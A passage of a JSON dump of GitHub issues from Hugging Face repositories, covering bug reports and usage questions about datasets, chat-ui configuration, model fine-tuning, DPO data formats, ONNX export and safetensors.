that:\r\n`train_dataset.push_to_hub(\"kopyl/mapped-833-icons-sdxl-1024-dataset\", token=True)`\r\nHere is the link of the pushed dataset: https://huggingface.co/datasets/kopyl/mapped-833-icons-sdxl-1024-dataset\r\n\r\n### Steps to reproduce the bug\r\n\r\nHere is the self-contained notebook:\r\n\r\nhttps://colab.research.google.com/drive/1RtCsEMVcwWcMwlWURk_cj_9xUBHz065M?usp=sharing\r\n\r\n### Expected behavior\r\n\r\nIt should be easily saved to disk\r\n\r\n### Environment info\r\n\r\nNVIDIA A100, Linux (NC24ads A100 v4 from Azure), CUDA 12.2.\r\n\r\n[pip freeze](https://pastebin.com/QTNb6iru)", "url": "https://github.com/huggingface/datasets/issues/6530", "state": "open", "labels": [], "created_at": "2023-12-23T15:18:27Z", "updated_at": "2023-12-24T09:40:30Z", "comments": 1, "user": "kopyl" }, { "repo": "huggingface/sentence-transformers", "number": 2392, "title": "util.paraphrase_mining returning scores only above 0.98", "body": "Hey,\r\nI'm using util.paraphrase_mining (sentence-transformers v2.2.2) to get similarity scores (cosine) in a corpus of ~20k texts with the encoder model being all-MiniLM-L6-v2 and with the parameters query_chunk_size=500, corpus_chunk_size=1000, top_k=500000, max_pairs=5000000. \r\nThe returned list of triplets contain scores only above 0.98. I was wondering why the lower scores don't appear. \r\nThanks in advance for your answer!", "url": "https://github.com/huggingface/sentence-transformers/issues/2392", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-23T13:00:27Z", "updated_at": "2024-01-29T14:20:33Z", "user": "sinangokce" }, { "repo": "huggingface/chat-ui", "number": 656, "title": "Web Search failed with \"Invalid URL\"", "body": "![image](https://github.com/huggingface/chat-ui/assets/4380009/229430b6-6d10-495f-be66-c5bc54f6061d)\r\n\r\nWhy is this happening? It seems to happen regardless of whether I have USE_LOCAL_WEBSEARCH set to true or false.\r\n```\r\nSERPAPI_KEY=\r\nUSE_LOCAL_WEBSEARCH=true\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"mistralai/Mixtral-8x7b-Instruct-v0.1\",\r\n \"displayName\": \"mistralai/Mixtral-8x7b-Instruct-v0.1\",\r\n \"description\": \"Mixtral-8x7b-Instruct-v0.1 is a state of the art language model, based on a mixture of experts, that outperforms ChatGPT.\",\r\n \"websiteUrl\": \"https://www.aaprintsupplyco.com\",\r\n \"preprompt\": \"\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}}{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.4,\r\n \"top_p\": 0.95,\r\n \"top_k\": 50,\r\n \"truncate\": 31768,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"[INST]\",\"\"]\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }],\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write a blog post\",\r\n \"prompt\": \"Your goal is to help me create a compelling blog post about a topic.\\nYou will follow the following process:\\n\\n1. Ask me for the topic of the blog post.\\n2. After I provide my answer you will need to collect some additional information by going through the next steps:\\na) Questions (ask any relevant questions pertaining to what additional information is needed from me to write a good blog post).\\n\\nOnce you have enough information, or once I say I am done, you will write the blog post.\"\r\n }, {\r\n \"title\": \"Improve my English\",\r\n \"prompt\": \"I want you to act as an English grammar and spelling corrector and improver. I will speak to you and you will answer in the corrected and improved version of my text, in English. I want you to replace my simplified A0-level words and sentences with improved, higher level English words and sentences. Keep the meaning same, but make them sound better. I want you to only reply the correction, the improvements and nothing else, do not write explanations. If there is nothing to improve, just reply with the original text.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"I want you to be my Prompt engineer. Your goal is to help me craft the best possible instruction prompt for my needs. The prompt will be used by you, an AI model. You will follow the following process:\\n\\n1. Your first response will be to simply ask me what the task I want to accomplish. \\n2. After I provide my answer and you will generate a first iteration of the prompt, but we will need to improve it through continual iterations by going through the next steps. You will generate two sections:\\na) Revised prompt (provide your rewritten prompt, it should be clear, concise, and easily understood by you),\\nb) Questions (ask any relevant questions pertaining to what additional information is needed from me to improve the prompt).\\n3. We will continue this iterative process with me providing additional information to you and you updating the prompt in the Revised prompt section until I say we are done.\\n\\nOnly after I say I am done, will you provide a response to the revised prompt.\"\r\n }\r\n ]\r\n },\r\n {\r\n \"name\": \"openchat/openchat-3.5-1210\",\r\n \"displayName\": \"openchat/openchat-3.5-1210\",\r\n \"description\": \"OpenChat 3.5 is the #1 model on MT-Bench, with only 7B parameters. Small and fast.\",\r\n \"websiteUrl\": \"https://www.aaprintsupplyco.com\",\r\n \"preprompt\": \"\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}GPT4 Correct User: {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}<|end_of_turn|>GPT4 Correct Assistant:{{/ifUser}}{{#ifAssistant}}{{content}}<|end_of_turn|>{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.4,\r\n \"top_p\": 0.95,\r\n \"top_k\": 50,\r\n \"truncate\": 8192,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_turn|>\",\"\"]\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }],\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write a blog post\",\r\n \"prompt\": \"Your goal is to help me create a compelling blog post about a topic.\\nYou will follow the following process:\\n\\n1. Ask me for the topic of the blog post.\\n2. After I provide my answer you will need to collect some additional information by going through the next steps:\\na) Questions (ask any relevant questions pertaining to what additional information is needed from me to write a good blog post).\\n\\nOnce you have enough information, or once I say I am done, you will write the blog post.\"\r\n }, {\r\n \"titl", "url": "https://github.com/huggingface/chat-ui/issues/656", "state": "closed", "labels": [], "created_at": "2023-12-22T19:19:34Z", "updated_at": "2024-01-09T05:45:13Z", "comments": 5, "user": "gururise" }, { "repo": "huggingface/chat-ui", "number": 655, "title": "Generation failed (Module.summarize) when using TogetherAI openai compatible endpoint", "body": "TogetherAI offers an [OpenAI compatible endpoint](https://docs.together.ai/docs/openai-api-compatibility). When using this endpoint with the model setup as follows:\r\n\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"mistralai/Mixtral-8x7b-Instruct-v0.1\",\r\n \"displayName\": \"Mixtral-8x7b\",\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }],\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ]\r\n }\r\n]`\r\n\r\nTASK_MODEL=`{\r\n \"name\": \"openchat/openchat-3.5-1210\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}GPT4 Correct User: {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}<|end_of_turn|>GPT4 Correct Assistant:{{/ifUser}}{{#ifAssistant}}{{content}}<|end_of_turn|>{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_turn|>\",\"\"]\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }]\r\n}`\r\n```\r\n\r\nInference and streaming work just fine with the output displayed in the chat window; however, in the console, the **following error always appears** after every interaction, and the conversation titles are never summarized.\r\n```\r\nError: Generation failed\r\n at Module.generateFromDefaultEndpoint (/home/gene/Downloads/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:22:9)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Module.summarize (/home/gene/Downloads/chat-ui/src/lib/server/summarize.ts:28:10)\r\n at async eval (/home/gene/Downloads/chat-ui/src/routes/conversation/[id]/+server.ts:167:26)\r\n```\r\n\r\nEven if I try setting TASK_MODEL='mistralai/Mixtral-8x7b-Instruct-v0.1', I still get this error.", "url": "https://github.com/huggingface/chat-ui/issues/655", "state": "open", "labels": [], "created_at": "2023-12-22T17:34:59Z", "updated_at": "2024-01-23T05:14:26Z", "comments": 1, "user": "gururise" }, { "repo": "huggingface/datasets", "number": 6529, "title": "Impossible to only download a test split", "body": "I've spent a significant amount of time trying to locate the split object inside my _split_generators() custom function.\r\nThen after diving [in the code](https://github.com/huggingface/datasets/blob/5ff3670c18ed34fa8ddfa70a9aa403ae6cc9ad54/src/datasets/load.py#L2558) I realized that `download_and_prepare` is executed before! split is passed to the dataset builder in `as_dataset`.\r\n\r\nIf I'm not missing something, this seems like bad design, for the following use case:\r\n\r\n> Imagine there is a huge dataset that has an evaluation test set and you want to just download and run just to compare your method.\r\n\r\nIs there a current workaround that can help me achieve the same result?\r\n\r\nThank you,", "url": "https://github.com/huggingface/datasets/issues/6529", "state": "open", "labels": [], "created_at": "2023-12-22T16:56:32Z", "updated_at": "2024-02-02T00:05:04Z", "comments": 2, "user": "ysig" }, { "repo": "huggingface/transformers.js", "number": 470, "title": "How to convert a model with .pt tail", "body": "### Question\n\nI'm new to this area,I'm woundering how to convert a model with .pt tail?thanks a lot", "url": "https://github.com/huggingface/transformers.js/issues/470", "state": "open", "labels": [ "question" ], "created_at": "2023-12-22T10:20:16Z", "updated_at": "2023-12-23T20:46:37Z", "user": "Bzayyz" }, { "repo": "huggingface/transformers.js", "number": 469, "title": "How to convert a model with .pt tail", "body": "### Question\n\nI'm new to this area,I'm woundering how to convert a model with .p2 tail?thanks a lot", "url": "https://github.com/huggingface/transformers.js/issues/469", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-22T10:20:05Z", "updated_at": "2023-12-22T10:20:54Z", "user": "Bzayyz" }, { "repo": "huggingface/chat-ui", "number": 650, "title": "chat-ui docker image failed to connect the mongo docker contrainer", "body": "step 1: build the chat-ui image\r\n~~~\r\ndocker build -t chat-ui -f ./Dockerfile.local .\r\n~~~\r\n\r\nstep 2:\r\n~~~\r\n# bind the 27016\r\ndocker run -d -p 27016:27017 --name mongo-chatui mongo:latest\r\n~~~\r\n\r\nstep 3: run a contrainer\r\n~~~\r\n# add a .env.local config\r\nMONGODB_URL=mongodb://localhost:27016\r\nHF_TOKEN=\r\n~~~\r\n\r\n~~~\r\ndocker run --rm --mount type=bind,source=\"$(pwd)/.env.local\",target=/app/.env.local -p 3000:3000 chat-ui\r\n~~~\r\n\r\n\r\n## results: when load localhost:3000\r\n~~~\r\nMongoServerSelectionError: connect ECONNREFUSED 127.0.0.1:27016\r\nat Timeout._onTimeout (/app/node_modules/mongodb/lib/sdam/topology.js:278:38)\r\nat listOnTimeout (node:internal/timers:573:17)\r\nat process.processTimers (node:internal/timers:514:7) {\r\nreason: TopologyDescription {\r\ntype: 'Unknown',\r\nservers: Map(1) { 'localhost:27016' => [ServerDescription] },\r\nstale: false,\r\ncompatible: true,\r\nheartbeatFrequencyMS: 10000,\r\nlocalThresholdMS: 15,\r\nsetName: null,\r\nmaxElectionId: null,\r\nmaxSetVersion: null,\r\ncommonWireVersion: 0,\r\nlogicalSessionTimeoutMinutes: null\r\n},\r\ncode: undefined,\r\n[Symbol(errorLabels)]: Set(0) {}\r\n}\r\nMongoTopologyClosedError: Topology is closed\r\nat /app/node_modules/mongodb/lib/sdam/topology.js:218:46 {\r\n[Symbol(errorLabels)]: Set(0) {}\r\n}\r\nMongoTopologyClosedError: Topology is closed\r\nat processWaitQueue (/app/node_modules/mongodb/lib/sdam/topology.js:514:46)\r\nat Topology.selectServer (/app/node_modules/mongodb/lib/sdam/topology.js:283:9)\r\nat Topology. (/app/node_modules/mongodb/lib/sdam/topology.js:42:94)\r\nat node:internal/util:442:7\r\nat new Promise ()\r\nat Topology.selectServerAsync (node:internal/util:428:12)\r\nat executeOperationAsync (/app/node_modules/mongodb/lib/operations/execute_operation.js:74:35)\r\nat /app/node_modules/mongodb/lib/operations/execute_operation.js:12:45\r\nat maybeCallback (/app/node_modules/mongodb/lib/utils.js:293:21)\r\nat executeOperation (/app/node_modules/mongodb/lib/operations/execute_operation.js:12:38) {\r\n[Symbol(errorLabels)]: Set(0) {}\r\n}\r\n~~~\r\n\r\n@nsarrazin", "url": "https://github.com/huggingface/chat-ui/issues/650", "state": "open", "labels": [ "support", "docker" ], "created_at": "2023-12-22T08:34:52Z", "updated_at": "2025-05-25T20:37:17Z", "comments": 6, "user": "walkacross" }, { "repo": "huggingface/chat-ui", "number": 649, "title": "Formatting is incorrect when using LiteLLM (Together.ai)", "body": "I'm using Mixtral-7b-Instruct-v0.1 via [LiteLLM](https://github.com/BerriAI/litellm) to provide a OpenAI compatible API to together.ai where the model is hosted. \r\n\r\nEverything works fine, including streaming; however, the formatting is messed up as shown. Any ideas why?\r\n![image](https://github.com/huggingface/chat-ui/assets/4380009/6855fad2-288f-403e-9ab8-1f2f409fe5c9)\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/649", "state": "closed", "labels": [ "bug", "question", "front", "models" ], "created_at": "2023-12-22T05:46:37Z", "updated_at": "2023-12-22T17:11:09Z", "user": "gururise" }, { "repo": "huggingface/distil-whisper", "number": 67, "title": "I can only use its encoder to extract audio features, right? How should I use it? Could you provide an example", "body": "I can only use its encoder to extract audio features, right? How should I use it? Could you provide an example", "url": "https://github.com/huggingface/distil-whisper/issues/67", "state": "open", "labels": [], "created_at": "2023-12-22T03:50:32Z", "updated_at": "2024-01-15T18:07:34Z", "user": "wvinzh" }, { "repo": "huggingface/transformers.js", "number": 468, "title": "Node.js", "body": "### Question\n\nWill this library work with Node.js?", "url": "https://github.com/huggingface/transformers.js/issues/468", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-21T23:03:36Z", "updated_at": "2023-12-21T23:06:53Z", "user": "Julianbullmagic" }, { "repo": "huggingface/gsplat.js", "number": 47, "title": "I don't need to load loading and onProgress\uff0cWhen data is loaded, how can I render it on the interface immediately?", "body": "I don't need to load loading\uff0cWhen data is loaded, how can I render it on the interface immediately? I see Class Loader\r\n\r\nNothing's been done there", "url": "https://github.com/huggingface/gsplat.js/issues/47", "state": "closed", "labels": [], "created_at": "2023-12-21T20:13:52Z", "updated_at": "2024-01-29T20:15:01Z", "user": "did66" }, { "repo": "huggingface/candle", "number": 1463, "title": "How to introduce openai triton in candle?", "body": "The handwritten CUDA operator is very complicated. How can we use openai triton in candle to simplify this process. \uff1a\uff09", "url": "https://github.com/huggingface/candle/issues/1463", "state": "open", "labels": [], "created_at": "2023-12-21T18:42:38Z", "updated_at": "2024-01-01T11:56:29Z", "user": "tyfeng1997" }, { "repo": "huggingface/transformers", "number": 28179, "title": "How to fine tune facebook/esm2_t33_650M_UR50D", "body": "### System Info\n\nHow to fine tune facebook/esm2_t33_650M_UR50D\uff1fIt's too big and the model.half() couldn't work. Besids, i always met the error : CUDA error: CUBLAS_STATUS_INTERNAL_ERROR when calling `cublasSgemm( handle, opa, opb, m, n, k, &alpha, a, lda, b, ldb, &beta, c, ldc). Is it possible that the model in the huggingface is wrong?\r\nThe following is the script:\r\nfrom os.path import join\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport torch.utils.data as data\r\nimport transformers\r\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification, Trainer\r\nfrom datasets import Dataset,load_metric\r\nfrom sklearn.model_selection import train_test_split\r\n#os.environ['CUDA_VISIBLE_DEVICES'] = '1'\r\nCURRENT_DIR = os.getcwd()\r\ncheck_point = join(CURRENT_DIR,\"esm1b_t33_650M_UR50S\")\r\n\r\n#Data processing\r\ndef process_tsv(file):\r\n sequences = list()\r\n labels = list()\r\n df = pd.read_csv(file,sep=\"\\t\")\r\n for ind in df.index:\r\n sequences.append(df[\"sequence\"][ind])\r\n labels.append(df[\"label\"][ind])\r\n\r\n return sequences,labels\r\n\r\n\r\ndef tokenize_add_label(sequences, labels, tokenizer):\r\n \"\"\"This function takes sequences and labels creates a Dataset containing tokenized sequences and add labels to it\r\n\r\n args:\r\n sequences (str): a list of sequences\r\n labels (int): a list of labels\r\n tokenizer : a pre-trained tokenizer\r\n\r\n return:\r\n Dataset: tokenized sequences and associated labels)\"\"\"\r\n sequences_tokenized = tokenizer(sequences, padding=True, truncation=True)\r\n sequences_tokenized = torch.float16(sequences_tokenized)\r\n labels = torch.tensor(labels)\r\n labels = labels.long()\r\n sequences_dataset = Dataset.from_dict(sequences_tokenized)\r\n sequences_dataset = sequences_dataset.add_column(\"labels\", labels)\r\n\r\n return sequences_dataset\r\n\r\nsequences,labels = process_tsv(join(CURRENT_DIR,\"example.tsv\"))\r\ntokenizer = AutoTokenizer.from_pretrained(check_point)\r\nsequences_dataset = tokenize_add_label(sequences,labels,tokenizer)\r\nnum_labels = max(labels)+1\r\nmodel = AutoModelForSequenceClassification.from_pretrained(check_point,num_labels=num_labels)\r\n#device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n#model.to(device)\r\nmodel.cuda()\r\n\r\n\r\n#model = model.half()\r\n\r\n#model.enable_input_require_grads()\r\nmodel_name = check_point.split(\"/\")[-1]\r\ntrainer_dir = f\"{model_name}-finetuned-model_esm-1b_on_7beta\"\r\nif not os.path.exists(trainer_dir):\r\n os.mkdir(trainer_dir)\r\n\r\nbatch_size = 1\r\ntraining_args = transformers.TrainingArguments(\r\n output_dir=trainer_dir, # output directory\r\n overwrite_output_dir=True,\r\n num_train_epochs=3, # total number of training epochs\r\n per_device_train_batch_size=batch_size, # batch size per device during training\r\n per_device_eval_batch_size=batch_size, # batch size for evaluation\r\n learning_rate=2e-5,\r\n warmup_steps=500, # number of warmup steps for learning rate scheduler\r\n weight_decay=0.01, # strength of weight decay\r\n logging_dir=trainer_dir, # directory for storing logs\r\n logging_steps=10,\r\n load_best_model_at_end=True,\r\n evaluation_strategy=\"epoch\",\r\n save_strategy=\"epoch\",\r\n save_total_limit=1,\r\n metric_for_best_model=\"accuracy\",\r\n greater_is_better=True,\r\n disable_tqdm=True,\r\n gradient_accumulation_steps = 2,\r\n gradient_checkpointing=True\r\n\r\n )\r\n\r\nmetric = load_metric(join(CURRENT_DIR,\"metrics\",\"accuracy/accuracy.py\"))\r\n\r\ndef compute_metrics(eval_pred):\r\n logits, labels = eval_pred\r\n print(\"logits\",logits)\r\n print(\"labels\",labels)\r\n predictions = np.argmax(logits, axis=-1)\r\n print(\"predictions\",predictions)\r\n return metric.compute(predictions=predictions, references=labels)\r\n\r\ntrainer = Trainer(\r\n model = model,\r\n args = training_args,\r\n train_dataset=sequences_dataset,\r\n eval_dataset=sequences_dataset,\r\n tokenizer=tokenizer,\r\n compute_metrics=compute_metrics,\r\n\r\n)\r\n\r\nmodel.config.problem_type\r\ntrainer.train()\r\ntrainer.state.log_history\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nAsking to truncate to max_length but no maximum length is provided and the model has no predefined maximum length. Default to no truncation.\r\nSome weights of EsmForSequenceClassification were not initialized from the model checkpoint at /home/wangmuqiang/fine_tune_esm2/esm1b_t33_650M_UR50S and are newly initialized: ['classifier.dense.bias', 'classifier.out_proj.bias', 'classifier.out_proj.weight', 'classifier.dense.weight']\r\nYou should probably TRAIN this model on a down-stream task to be able to use it fo", "url": "https://github.com/huggingface/transformers/issues/28179", "state": "closed", "labels": [], "created_at": "2023-12-21T09:50:27Z", "updated_at": "2024-01-30T08:03:39Z", "user": "Admire7494" }, { "repo": "huggingface/alignment-handbook", "number": 81, "title": "Why we use a lower batch size when comparing SFT lora with SFT full fine-tuning ?", "body": "https://github.com/huggingface/alignment-handbook/blob/main/recipes/zephyr-7b-beta/sft/config_lora.yaml\r\n\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/81", "state": "closed", "labels": [], "created_at": "2023-12-20T21:09:33Z", "updated_at": "2024-01-07T21:03:14Z", "comments": 2, "user": "shamanez" }, { "repo": "huggingface/trl", "number": 1115, "title": "How to prepare multi-turn dialogue dataset for dpo?", "body": "the single-turn dialogue dataset is like:\r\ndpo_dataset_dict = {\r\n \"prompt\": [\r\n \"hello\",\r\n \"how are you\",\r\n \"What is your name?\",\r\n \"What is your name?\",\r\n \"Which is the best programming language?\",\r\n \"Which is the best programming language?\",\r\n \"Which is the best programming language?\",\r\n ],\r\n \"chosen\": [\r\n \"hi nice to meet you\",\r\n \"I am fine\",\r\n \"My name is Mary\",\r\n \"My name is Mary\",\r\n \"Python\",\r\n \"Python\",\r\n \"Java\",\r\n ],\r\n \"rejected\": [\r\n \"leave me alone\",\r\n \"I am not fine\",\r\n \"Whats it to you?\",\r\n \"I dont have a name\",\r\n \"Javascript\",\r\n \"C++\",\r\n \"C++\",\r\n ],\r\n}\r\n\r\nSo, how to prepare a multi-turn dialogue dataset? Can you provide an example? Thank you!", "url": "https://github.com/huggingface/trl/issues/1115", "state": "closed", "labels": [ "\ud83c\udfcb DPO" ], "created_at": "2023-12-20T09:14:45Z", "updated_at": "2024-10-03T14:12:48Z", "user": "chloefresh" }, { "repo": "huggingface/transformers", "number": 28155, "title": "What is the minimum video card with large memory required to run the mixtral-8x7b model", "body": "I mean the model that just came out\uff1amistralai/Mixtral-8x7B-Instruct-v0.1\uff0clooks like a lot of parameter files\uff0cwhat is the minimum nvidia graphics card video memory required?", "url": "https://github.com/huggingface/transformers/issues/28155", "state": "closed", "labels": [], "created_at": "2023-12-20T01:54:45Z", "updated_at": "2024-01-28T08:04:44Z", "user": "zysNLP" }, { "repo": "huggingface/dataset-viewer", "number": 2218, "title": "JobManagerCrashedError jobs are never retried", "body": "Currently, we have 7768 jobs with error_code `JobManagerCrashedError`. Some of them are caused by zombie killer set crashes.\r\n\r\n```\r\nAtlas atlas-x5jgb3-shard-0 [primary] datasets_server_cache> db.cachedResponsesBlue.aggregate([{$match:{error_code:\"JobManagerCrashedError\",\"details.copied_from_artifact\":{$exists:false}}},{$group:{_id:{kind:\"$kind\"},count:{$sum:1}}},{$sort:{count:-1}}])\r\n[\r\n { _id: { kind: 'split-duckdb-index' }, count: 3658 },\r\n { _id: { kind: 'split-descriptive-statistics' }, count: 1872 },\r\n { _id: { kind: 'config-parquet-and-info' }, count: 1765 },\r\n { _id: { kind: 'split-first-rows-from-streaming' }, count: 322 },\r\n { _id: { kind: 'split-first-rows-from-parquet' }, count: 72 },\r\n { _id: { kind: 'split-opt-in-out-urls-scan' }, count: 60 },\r\n { _id: { kind: 'dataset-config-names' }, count: 21 }\r\n]\r\n\r\n```\r\n\r\nBut most of them are set as crashed when deploying and are never retried, even if they are fast and straightforward to process.\r\nShould we retry those jobs in backfill? I think we should differentiate the ones that are easy to process against those that are difficult (primarily because of OOMs), maybe retry once or twice, and set a different error so that we can identify which of them are caused by limited resources.\r\n \r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2218", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-19T15:22:30Z", "updated_at": "2024-01-09T20:32:58Z", "user": "AndreaFrancis" }, { "repo": "huggingface/optimum", "number": 1608, "title": "XENOVA conversion issues", "body": "### System Info\r\n\r\n```shell\r\nusing the requirements.txt in Xenova for environment. \r\n\r\nhttps://github.com/xenova/transformers.js/blob/main/scripts/requirements.txt\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@xenova \r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\n\"Error while initializing BPE: Token `_` out of vocabulary\"\r\n\r\n### Expected behavior\r\n\r\nBeen trying to run blenderbot90, 400, 1b distilled.\r\n\r\nHave had lots of issues, but I'll start with this one.\r\n\r\n\r\nversion 1 attempt, and loading from local after git-large file from HF repo.\r\n\r\n tokenizer = AutoTokenizer.from_pretrained(model)\r\n model = ORTModelForSeq2SeqLM.from_pretrained(model)\r\n inputs = tokenizer(\"what is a black hole\", return_tensors=\"pt\")\r\n gen_tokens = model.generate(**inputs)\r\n response = tokenizer.batch_decode(gen_tokens)\r\n\r\n\r\nversion 2 attempt, directly repo using pipeline\r\n\r\n from transformers import AutoTokenizer, pipeline\r\n from optimum.onnxruntime import ORTModelForSeq2SeqLM\r\n tokenizer = AutoTokenizer.from_pretrained(\"Xenova/blenderbot_small-90M\")\r\n model = ORTModelForSeq2SeqLM.from_pretrained(\"Xenova/blenderbot_small-90M\")\r\n onnx_pipe = pipeline(\"conversational\", model=model, tokenizer=tokenizer)\r\n text = \"what is a black hole\"\r\n response = onnx_pipe (text)\r\n \r\n \r\nBoth cases getting this error: \"Error while initializing BPE: Token `_` out of vocabulary\"", "url": "https://github.com/huggingface/optimum/issues/1608", "state": "closed", "labels": [ "bug" ], "created_at": "2023-12-19T02:11:58Z", "updated_at": "2023-12-19T04:54:00Z", "comments": 3, "user": "gidzr" }, { "repo": "huggingface/safetensors", "number": 409, "title": "Doesn't work with versions of torch where \"meta\" dtype is not supported.", "body": "### System Info\n\nThis is on my mac where I was just testing the interface. It seems like this could easily be fixed.\r\n```\r\n...\r\n>>> from safetensors.torch import save_file\r\n>>> x\r\n{'a': tensor([1., 1., 1., 1., 1., 1., 1., 1., 1., 1.])}\r\n>>> x['a'].device\r\ndevice(type='cpu')\r\n>>> save_file(x, filename='foo')\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/usr/local/lib/python3.9/site-packages/safetensors/torch.py\", line 281, in save_file\r\n serialize_file(_flatten(tensors), filename, metadata=metadata)\r\n File \"/usr/local/lib/python3.9/site-packages/safetensors/torch.py\", line 460, in _flatten\r\n shared_pointers = _find_shared_tensors(tensors)\r\n File \"/usr/local/lib/python3.9/site-packages/safetensors/torch.py\", line 72, in _find_shared_tensors\r\n if v.device != torch.device(\"meta\") and storage_ptr(v) != 0 and storage_size(v) != 0:\r\nRuntimeError: Expected one of cpu, cuda, xpu, mkldnn, opengl, opencl, ideep, hip, msnpu, xla, vulkan device type at start of device string: meta\r\n>>> safetensors.__version__\r\n'0.4.1'\r\n>>> torch.__version__\r\n'1.8.1'\r\n```\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Reproduction\n\nInstall torch 1.8.1 and safetensors 0.4.1 (this is current safetensor version in pip default channel)\r\nrun the code above (sorry I have not reduced this to a script but it's the most minimal example of using safetensors)\n\n### Expected behavior\n\nsave_file should work with older versions of torch, like 1.8.1", "url": "https://github.com/huggingface/safetensors/issues/409", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-18T15:51:28Z", "updated_at": "2024-01-23T01:49:25Z", "user": "danpovey" }, { "repo": "huggingface/candle", "number": 1457, "title": "How to do to quantize manually a phi-2 version, starting from safetensors file", "body": "Hi\r\n\r\nI have fine tuned a phi-2 model using lora\r\n\r\nI merged adapter with base model to get a trained one\r\n\r\nI now have a bunch of safetensors file\r\n\r\nHow is it possible to convert these files into a gguf file ( llama.cpp concerter does not support phi)\r\n\r\nIn other words, how is it possible to achieve the same as : model-v2-q4k.gguf in lmz/candle-quantized-phi\r\n\r\n\r\n", "url": "https://github.com/huggingface/candle/issues/1457", "state": "closed", "labels": [], "created_at": "2023-12-18T15:14:37Z", "updated_at": "2023-12-18T15:58:12Z", "user": "ghost" }, { "repo": "huggingface/optimum", "number": 1605, "title": "Static Quantization - Token classification", "body": "Hi, \r\nI am following the code [here](https://github.com/huggingface/optimum/tree/main/examples/onnxruntime/quantization/token-classification) for doing static quantization on my token classification model.\r\n\r\nThe inference time for quantized model(static) is almost the same as non quantized one. I have tried dynamic quantization too and it is showing some improvement in terms of latency but i need more latency improvements.\r\n\r\nDo i have to do anything additional to lower/improve the inference time than what is mentioned [here](https://github.com/huggingface/optimum/tree/main/examples/onnxruntime/quantization/token-classification) for static quantization. Can anyone please help me?", "url": "https://github.com/huggingface/optimum/issues/1605", "state": "open", "labels": [ "quantization" ], "created_at": "2023-12-18T13:31:33Z", "updated_at": "2024-10-09T09:21:22Z", "comments": 0, "user": "akshay-babbar" }, { "repo": "huggingface/diffusers", "number": 6211, "title": "[Examples] How much time you support training scripts of text to video in diffusers?", "body": "I want to train svd in diffusers, can you support this feature in examples.\r\nThanks for your contributions.", "url": "https://github.com/huggingface/diffusers/issues/6211", "state": "closed", "labels": [ "stale" ], "created_at": "2023-12-18T08:26:57Z", "updated_at": "2024-01-26T15:05:32Z", "user": "jiaxiangc" }, { "repo": "huggingface/optimum", "number": 1604, "title": "Table Transformer to ONNX", "body": "### Feature request\n\nHi all,\r\nI am trying to convert Table-transformer model from transformers(pretrained) to ONNX. Error reads something like \" 'table-transformer' is not a supported 